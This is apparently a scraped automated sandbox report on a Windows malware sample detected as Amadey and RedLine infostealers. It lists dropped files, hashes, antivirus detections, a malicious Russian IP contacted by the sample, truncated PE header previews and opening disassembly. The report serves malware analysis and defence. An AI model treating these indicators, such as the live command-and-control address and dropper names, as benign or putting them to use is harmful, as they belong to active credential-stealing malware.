                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/06/addressingexbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoorbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/Noncebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renewbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://tempuri.org/Entity/Id17Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          193.233.20.11
                                                                                                                                                          unknownRussian Federation
                                                                                                                                                          8749REDCOM-ASRedcomKhabarovskRussiaRUtrue
                                                                                                                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                          Analysis ID:803862
                                                                                                                                                          Start date and time:2023-02-10 11:37:07 +01:00
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 8m 29s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                          Number of analysed new started processes analysed:13
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample file name:file.exe
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@12/8@0/1
                                                                                                                                                          EGA Information:
                                                                                                                                                          • Successful, ratio: 80%
                                                                                                                                                          HDC Information:
                                                                                                                                                          • Successful, ratio: 100% (good quality ratio 95.8%)
                                                                                                                                                          • Quality average: 85.1%
                                                                                                                                                          • Quality standard deviation: 22.8%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 185
                                                                                                                                                          • Number of non-executed functions: 97
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                          • Override analysis time to 240s for rundll32
                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                                                                          • Execution Graph export aborted for target bvr38xq.exe, PID 1240 because it is empty
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          11:38:41API Interceptor21x Sleep call for process: bvr38xq.exe modified
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          193.233.20.11file.exeGet hashmaliciousBrowse
                                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                  REDCOM-ASRedcomKhabarovskRussiaRUfile.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 193.233.20.11
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exefile.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  fl47EOJvPm.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe
                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):226
                                                                                                                                                                                                                                          Entropy (8bit):5.354940450065058
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                                                          MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                                                          SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                                                          SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                                                          SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):2843
                                                                                                                                                                                                                                          Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx1qHjW:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxM
                                                                                                                                                                                                                                          MD5:E787CF7FE6F73C60B1ADCB6CFE9A2FAE
                                                                                                                                                                                                                                          SHA1:CF44D405D677875BC3AC3A41336DA6C8F3E58277
                                                                                                                                                                                                                                          SHA-256:6332B18367739773EAA1686C22A11DCEAD2D7314EBCEE5510F5E6A799A301203
                                                                                                                                                                                                                                          SHA-512:8C7213E33F6A56744FAED770ECC85BFC0F9DF1EA07249CFA6FDFD1EB0822F0ADD47BB072EE21CA6442D03A1E44FE2613BFC4FFC4B72B029F33AA292A390F023B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):241664
                                                                                                                                                                                                                                          Entropy (8bit):6.368190069123744
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                                                                                                                                                                                          MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                                                                                                                                                                                          SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                                                                                                                                                                                          SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                                                                                                                                                                                          SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe, Author: Joe Security
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 82%, Browse
                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: fl47EOJvPm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):610816
                                                                                                                                                                                                                                          Entropy (8bit):7.841750727123454
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:FMrTy90K3cSojyVMuIMlexHMgRkNR+YkjR:aykShVXlezc2
                                                                                                                                                                                                                                          MD5:AC6FB170803555E15DA3A1BA13CBC6D3
                                                                                                                                                                                                                                          SHA1:66E210CB20912A8FB82CFBED0742541A41FCC25C
                                                                                                                                                                                                                                          SHA-256:D7339ECAC493636FE5B4AF1F418BFF9A21F355D74D814391B115C7FF05DFD9AC
                                                                                                                                                                                                                                          SHA-512:C868F9E2CBD8FC1C68CE2156A1B91A5C65A0E7722A380F2DC0194D113ACFF4192D76289CE6513E05B6A0E85A0FCB2803E716CC0BC40D4095775C2A8191B704F7
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.......................................@...... ......................................D...............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............H..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):467456
                                                                                                                                                                                                                                          Entropy (8bit):6.774745957610931
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:q0lu6aSHczn//H4D6HMbPFn21BxBdrnfWxj6T/:qVSGU6HM7RMBnfWY/
                                                                                                                                                                                                                                          MD5:38843698815444B78BB8A73CB2A55E1C
                                                                                                                                                                                                                                          SHA1:823D3BCA57C0EF79B64B736E0B856B15EB8A1427
                                                                                                                                                                                                                                          SHA-256:D08806D5EB85A075C3CA96312BC79DB64BE887550A4A66D9FAA89317AD9BEFF3
                                                                                                                                                                                                                                          SHA-512:86EC0F5BC0FED715B9E9298C6C75AC97FCA05E9CEE217F9452C50DC54EDA35C7099FA2CD751A501036068D1455632D86D5E33B126767626BAFD641E4B9D0B57F
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 32%, Browse
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........B...B...B...\.[.S...\.J.h...\.M.....e...K...B...+...\.D.C...\.Z.C...\._.C...RichB...........PE..L...R..a.....................P......7s............@.................................%7..........................................d....P.......................`......................................0-..@...............T............................text...d........................... ..`.data...@...........................@....miyi...F.... ......................@..@.xiguda......@......................@..@.rsrc........P......................@..@.reloc..z....`......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):206848
                                                                                                                                                                                                                                          Entropy (8bit):7.24372843243464
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:KZy+bnr+O1X5GWp1icKAArDZz4N9GhbkrNEk6jhl1Jw5D+QMpv1DQoT8njdlYj:KZy+bnr+kp0yN90QEhDwpopv1DQPnj4
                                                                                                                                                                                                                                          MD5:AFC0E8E01E2B88123841047710836075
                                                                                                                                                                                                                                          SHA1:3566BB517E62D0BC0FA0D222F57AFA8484B4C4BB
                                                                                                                                                                                                                                          SHA-256:0B770E8B3F94A5619F73D87065904A0AAC0B53C6AF95556E19F0C37A82C472BB
                                                                                                                                                                                                                                          SHA-512:D90F2CED0A2ED5F92B76CB95C0AEEA456247034D843958E253A1D2F0DE853A4E07D7C0237E4762802F1E1B73C8B637AC4445D9D16EC310EB483538BE0FDCE025
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.................................j.....@...... ..........................................................p..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):11264
                                                                                                                                                                                                                                          Entropy (8bit):4.97029807367379
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                                                                                                                                                                                          MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                          SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                                                                                                                                                                                          SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                                                                                                                                                                                          SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):179200
                                                                                                                                                                                                                                          Entropy (8bit):4.951529552333406
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:OxqZWXragQx+/pnab8PeR5D+hb/xNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOuD:0qZWpnaQC+h
                                                                                                                                                                                                                                          MD5:EF8079CF160510D0DA7162BC08F753D8
                                                                                                                                                                                                                                          SHA1:E786CC8BEE83E4A37433DDCCF9D3540E1F6533FE
                                                                                                                                                                                                                                          SHA-256:A6416CA607F03E7D02DD9C8B546113C71F421C0BA8438DAFB941D25F8CF2C9E6
                                                                                                                                                                                                                                          SHA-512:959B08126358527B794A276F6E9F818250F888D9F108B46766F6C2E50186ACC8F406ACBEB94CA97B5F0E329B27F3851003446715D5D040B5C0FEF4010011A2C3
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, Author: ditekSHen
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.................0.................. ........@.. ....................... ............@.................................8...O.......$............................................................................ ............... ..H............text....... ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):7.89368932675997
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                          File name:file.exe
                                                                                                                                                                                                                                          File size:801792
                                                                                                                                                                                                                                          MD5:f83ef0c72937a6c833bfe8d3511317e5
                                                                                                                                                                                                                                          SHA1:5312837ca61166d8ad2998cc6d3a2b594165dec8
                                                                                                                                                                                                                                          SHA256:ffdff2d87d032d30d6c3e794b6bc7b033d0cdf97a69ff32a563279e2844d3e13
                                                                                                                                                                                                                                          SHA512:6abd653dee3659bcb38d9e72e5a1b56f5ecffa3a4b6372635e9198f6b42229b285648887af2ce04417856d34ef4ba19b0fab4dd256676f76f76f8a4e09cd066c
                                                                                                                                                                                                                                          SSDEEP:12288:UMr1y90JGxs99q27rD9OQszK5NMh3u2HM9aoLokYkjwDMFyJaWDns:ZyEGxs9eQGl3xEC74FyAWQ
                                                                                                                                                                                                                                          TLSH:5705120797FCD026E4B517305EF257D31A3B7E812B24835A235E981B48B39F4A631B9B
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                                                                                                                                                                                                          Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                                                          Entrypoint:0x406a60
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:10
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:10
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:10
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          call 00007FE66CB32105h
                                                                                                                                                                                                                                          jmp 00007FE66CB31A15h
                                                                                                                                                                                                                                          push 00000058h
                                                                                                                                                                                                                                          push 004072B8h
